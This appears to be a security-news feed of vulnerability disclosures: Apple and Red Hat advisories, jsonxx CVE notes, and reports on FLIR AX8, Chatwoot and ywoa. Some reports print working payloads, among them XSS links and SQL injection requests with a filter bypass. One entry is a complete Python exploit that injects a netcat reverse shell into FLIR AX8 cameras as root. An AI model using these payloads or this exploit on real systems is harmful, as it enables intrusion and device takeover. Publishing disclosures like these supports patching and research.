Jsonxx or Json++ is a JSON parser, writer and reader written in C++. In affected versions of jsonxx json parsing may lead to stack exhaustion in an address sanitized (ASAN) build. This issue may lead to Denial of Service if the program using the jsonxx library crashes. This issue exists on the current commit of the jsonxx project and the project itself has been archived. Updates are not expected. Users are advised to find a replacement.

CVE-2022-23460

Apple Security Advisory 2022-08-18-1 - Safari 15.6.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-08-18-1 Safari 15.6.1

Safari 15.6.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213414.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Safari 15.6.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmL+gHUACgkQ4RjMIDke  
Nxm9eg/8CZFhmd5zgsQlwjn4R9kWVnIHCIzkhmjQGMzQ3C1FCiMwt+aDN2C1aYxN  
DiElfQy6ieI+4RNTxuNakhAQ0lS7F+TStHW9meblHkIA/qFfhBVxyaWZr+Hl0Bsw  
2K+0D9twK6xqh88hlvdm/GGEkEv8pKXKtzWaDoOdutXtasG6apc2nAMcqcWyN3SE  
hw+/PXhnxY5TNDQsz4wYsriichEPHIPJh3tCEgV2EvfsYx3GrX8Yga3T34GHwSj7  
H04Q3P1vNkdDDziFV7gZuWVXqKrpQxnReIKtZzffO0cW2x7lsSKw3H70yHlh2JLL  
yUDP28jJXOFGHD3izx+YHmFB4Q4dcHSVsil39Mq150s5iyJSkO2YDgWCyZBQ1tuB  
/dLIGuuQQtA3CqzBPSKneeeb0Cf5I6dnjh93R/aXLNiy+1AvizxJFOJ+EAlDCOxt  
o85iZxjWaGaQxng3qeA5nex5QWUvXRPyXoxyxnkfEeswv7PX6XLQXTASIo/Ug3E8  
KcIbtnkPatuwHt44eprrW6afaWhiY2IhiLKRFQeDm5vtYOr0FDAWGKl9bW203Frt  
2o6TVP9uXxZRIfMUmxBjdvNFScez49vlU6v+cIjj8UON/lWKZLkLDEFxfCWxlAWK  
eTc6a0tIAP5EMyd7EZdVhvxJSMxcCrXiO2iiS5TccIFZ5VvgZwA=t1cZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-18-1

Apple Security Advisory 2022-08-17-1 - iOS 15.6.1 and iPadOS 15.6.1 addresses code execution and out of bounds write vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-08-17-1 iOS 15.6.1 and iPadOS 15.6.1iOS 15.6.1 and iPadOS 15.6.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213412.KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privileges. Apple is aware of a report that this issue mayhave been actively exploited.Description: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32894: an anonymous researcherWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: An out-of-bounds write issue was addressed with improvedbounds checking.WebKit Bugzilla: 243557CVE-2022-32893: an anonymous researcherThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.6.1 and iPadOS 15.6.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmL9UiMACgkQ4RjMIDkeNxkiuw/+IhqxvCCS9q8hQMHDpFvVVmFdfO+7ukTVSpd12Cp5r0VGVP/zJOCecXR1cnFHIPx8zVZXzQzsa+lCSWhT+20qOiuCjpqWNVY9pCovCPds3r1hhL2/1H0KejGK2Ms910r+yxvEmhzz0MPk95d5+k+LaBPC1sfuNVTn9eUXImPDuLzLIyd8nW5khjNWspOIlS82VNBAcw8VQMxjgsiD6lhSsqvdkBPNhbI4/mMeIEXOOb+fRtHUOtorGLF2R1DzU1zmPLytcPGE+hxVXnR5F1z/+ea1DEWumvzSNfwja9HI2xPfmm9E8Pomq9lkSEW8cxlqAdKY2/cQ2B2I7ihJ3REfJjSnhXqTsuad1jVn9k1t8ZmKBWh6bgOQKQQg9BfIhcCeL398fmRUZQG1h6zo33MukUMMjfTgRjrjxhETLYCZQybjFAC4s98j2S0oyUpKaBUHc+tL/uupW01LwzP53SR2e4rBQhi+ACqiCEoJKAHYfJaj6YeblILiM6SaQdfbsiCzSIqM6nJLl5ZIYn6rXEEKGyGpKMAYXvc7FsR691DTQxMiQ8KcraoCwAerLzviWOF2tVNmDYkv5EFnXhSB4+uYzViSQhPKM8s2DRhP/WhxdVF3woRhIyHLq60SqKoFKvQwTVTugIFIR4cGfsfAbV7zCBhqH7+fKBGfLeTOBCH7ULE=SLRt-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-17-1

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS

Jsonxx or Json++ is a JSON parser, writer and reader written in C++. In affected versions of jsonxx use of the Value class may lead to memory corruption via a double free or via a use after free. The value class has a default assignment operator which may be used with pointer types which may point to alterable data where the pointer itself is not updated. This issue exists on the current commit of the jsonxx project. The project itself has been archived and updates are not expected. Users are advised to find a replacement.

CVE-2022-23459

Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.7.0.

**Title**

XSS in markdown link-maker

**Description**

While chatting with a client, both sides may use markdown. However, neither client's nor Chatwoot inner user's input is verified.

**Steps to reproduce.**

Note: this works in Safari and Firefox, not Chrome.

I will use Telegram bot.

1.  1\. Start a conversation as an attacker with Chatwoot staff using created Telegram bot.
2.  2\. Send payload [clickMe](javascript:alert(document.cookie)) as a message.
3.  3\. As a Chatwoot staff click on the link, trigger an XSS.

Also it is possible to create a malicious link as a staff (e.g. leave it in other's staff conversation in order to trigger an XSS on their side).

1.  1\. While intercepting your traffic send a message [clickMe](https://google.com) to pass frontend check.
2.  2\. In the outcoming POST request to /api/v1/accounts/2/conversations/1/messages modify the body, so it looked something like this:

    {
        "content":"[click](javascript:alert(document.cookie))",
        "private":false,
        "echo_id":"{yourId}",
        "cc_emails":"",
        "bcc_emails":""
    }
    

3.  3\. As some other staff click on the link, trigger an XSS.

I'm leaving a video PoC for both cases:

Video PoC

**Possible remediation**

Verify message content.

**Impact**

This vulnerability is capable of running an arbitrary JS code.

CVE-2022-0542: Cross-site Scripting (XSS) - DOM in chatwoot

Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

Ywoa before v6.1 was discovered to contain a SQL injection vulnerability via /oa/setup/checkPool?database.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**\[Frontend\] <6.1 Version Unauthorized SQL Injection**

  
Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code  
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java  
  
The above does not need to care, specifically note the following if(isValid)  
  
First get the version from the configuration  
  
Get to version 6.1, then start the version determination  
  
Determine if it is less than 3  
  
Determine if it is less than 4  
  
Determine if it is less than 5  
  
Determine if it is equal to 6  
  
The condition to be used here is that the version needs to be <= 6 in order to be successful  
So change the version  
  
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java  
  
  
Just change the value of the version field in the oa\_sys\_ver table in the database  
  
Restart tomcat after the change, and then request the specified interface without logging in

POST /oa/setup/checkPool?database=test' HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Found that the return here actually has a return, will prompt the SQL statement to report an error  
  
Here we bring out the user directly with extractvalue  
  
**POC**

and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))\--+

**HTTP**

POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

CVE-2022-36606: yimiYWOA<6.1 version foreground unauthorized SQL injection · Issue #25 · cloudwebsoft/ywoa

FLIR AX8 versions 1.46.16 and below unauthenticated remote OS command injection exploit.

    # -*- coding: utf-8 -*-# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection# Date: 8/19/2022# Exploit Author: Samy Younsi Naqwada (https://samy.link)# Vendor Homepage: https://www.flir.com/# Software Link: https://www.flir.com/products/ax8-automation/# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok# Version: 1.46.16 and under.# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)# CVE : CVE-2022-36266from __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3urllib3.disable_warnings()def banner():  flirLogo = """ ███████╗██╗     ██╗██████╗ ██╔════╝██║     ██║██╔══██╗█████╗  ██║     ██║██████╔╝██╔══╝  ██║     ██║██╔══██╗██║     ███████╗██║██║  ██║ ╚═╝     ╚══════╝╚═╝╚═╝  ╚═╝                          .---------------------.   █████╗ ██╗  ██╗ █████╗  /--'--.------.--------/|  ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||  ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||  ██╔══██║ ██╔██╗ ██╔══██╗ |       |( () )|      ||  ██║  ██║██╔╝ ██╗╚█████╔╝ |       | `--` |      |/  ╚═╝  ╚═╝╚═╝  ╚═╝ ╚════╝  `-------`------`------`                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(flirLogo))def pingWebInterface(RHOST, RPORT):  url = 'http://{}:{}/login/'.format(RHOST, RPORT)  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)  try:    if response.status_code != 200:      print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    version = soup.find('p', id = 'login-title').string    print('[INFO] {} detected.'.format(version))  except:    print('[ERROR] Can\'t grab the device version...')def execReverseShell(RHOST, RPORT, LHOST, LPORT):  url = 'http://{}:{}/res.php'.format(RHOST, RPORT)  payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)  data = 'action=alarm&id=2;{}'.format(payload)  headers = {    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',  }  try:    print('[INFO] Executing reverse shell...')    response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)    print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))    return  except Exception as e:      print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

FLIX AX8 1.46.16 Remote Command Execution

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2022:6051-01  
Product:           RHOL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6051  
Issue date:        2022-08-18  
CVE Names:         CVE-2021-38561 CVE-2022-0759 CVE-2022-1012  
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1785  
                   CVE-2022-1897 CVE-2022-1927 CVE-2022-2068  
                   CVE-2022-2097 CVE-2022-21698 CVE-2022-30631  
                   CVE-2022-32250  
====================================================================  
1. Summary:

An update is now available for RHOL-5.5-RHEL-8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

* kubeclient: kubeconfig parsing error can lead to MITM attacks  
(CVE-2022-0759)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd  
LOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `  
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account  
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.  
LOG-2134 - The infra logs are sent to app-xx indices  
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff  
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.  
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL  
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.  
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected.  
LOG-2242 - Log file metric exporter is still following /var/log/containers files.  
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed  
LOG-2264 - Logging link should contain an icon  
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.  
LOG-2276 - Fluent config format is hard to read via configmap  
LOG-2290 - ClusterLogging Instance status in not getting updated in UI  
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1  
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.  
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch  
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck  
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously  
LOG-2333 - Journal logs not reaching Elasticsearch output  
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.  
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"  
LOG-2384 - Provide a method to get authenticated from GCP  
LOG-2411 - [Vector] Audit logs forwarding not working.  
LOG-2412 - CLO's loki output url is parsed wrongly  
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type  
LOG-2418 - EO supported time units don't match the units specified in CRDs.  
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong  
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift  
LOG-2444 - The write index is removed when `the size of the index` > `diskThresholdPercent% * total size`.  
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.  
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.  
